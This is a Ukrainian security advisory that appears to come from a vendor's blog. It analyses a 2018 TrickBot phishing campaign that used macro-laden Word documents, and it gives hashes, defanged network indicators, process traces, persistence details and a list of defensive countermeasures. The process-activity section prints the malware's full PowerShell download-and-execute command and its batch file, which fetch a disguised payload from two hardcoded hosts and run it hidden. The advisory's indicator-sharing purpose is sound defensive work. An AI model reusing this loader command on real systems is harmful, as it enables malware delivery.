  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_trickbot_280318

Доброго дня, панове.

Вчора проходила розсилка шкідливого коду типу #trickbot (розглядали в минулому році)

На відміну від попередніх розсилок тут і тут, цього разу – документи із макросами.

Рівень загрози (для організацій які досі не заблокували макроси) – середній.

Для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Макрос містить чітко вказане ім’я payload та два різні сервери завантаження
  • Основне тіло завантажується як зображення, хоча є некодованим додатком
  • Одразу після запуску перевіряє Public IP
  • Зупинка процесу призводить до перезапуску payload
  • Повторний запуск (інфікування) генерують нове ім’я payload проте шлях незмінний

Схема атаки:

email > Attach (.doc(x)) > Winword > cmd > Powershell > 
2 hardcoded URL >  $env:temp + '\ kizsgkv.exe

#1 Завантаження основного тіла:


#2 Закріплення в системі:


#3 Повторний запуск основного тіла


Маркери IOC:

документ приманка:

SHA-256        3782f96c6d9f3136651da208465fa939313b7e4f21bdc4ef10c05926e0428a65
File name   SecureMessage.doc
File size      62 KB

основна частина (джерела станом на 29те вже не працюють):

SHA-256    2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c
File name   svoren.png >> \Temp\kizsgkv.exe
File size      392 KB

Мережеві IOC:

завантаження payload – вже не дійсні

202.218.252.73   m-tensou{.} net  GET /svoren.png HTTP/1.1
202.169.44.149   interbanx{.} co.id        GET /svoren.png HTTP/1.1

трафік скомпрометованої системи

54.84.104.112    checkip.amazonaws{.}com   GET / HTTP/1.1   Mozilla/5.0
82.146.60.85      49642 → https(443) [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1  

Активність по процесам:

Відкриття документу призводить до активації макросу, який у свою чергу ініціює завантаження основної частини засобами Powershell

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

Зміст .bat файлу

Vxxhpfqnsmql.bat
PowerShell "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).
DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');
Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}
try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}
catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

 Закріплення через планувальник задач

\MsNetMonitor                    c:\users\operator\appdata\roaming\netviewer\kiztgkv.exe  9/11/2016 7:57 AM   

 Відновлення в разі зупинки процесу

"C:\Users\operator\AppData\Local\Temp\kizsgkv.exe"
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Windows\system32\svchost.exe -k netsvcs
taskeng.exe {DF877B3F-E8C0-424D-AF5E-43A877CA9BCB} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
taskeng.exe {1E8FF255-2D23-4815-9E0C-10E2B16FF7A8} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe

Контрзаходи:

  • Якщо для роботи макроси не є потрібними – деактивуйте їх (реєстр, GPO, параметри MS Office)
  • Заборона запуску дочірніх процесів для додатків MS Office (cmd, PowerShell etc)
  • Блокування доступу до мережі Інтернет для процесу PowerShell (варіант 1й) + cmd, + winword.exe (про всяк випадок)
  • Якщо ж PowerShell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю C:\Users\**\ !
  • Заборона виклику PowerShell через CMD
  • Контроль передачі запускних файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR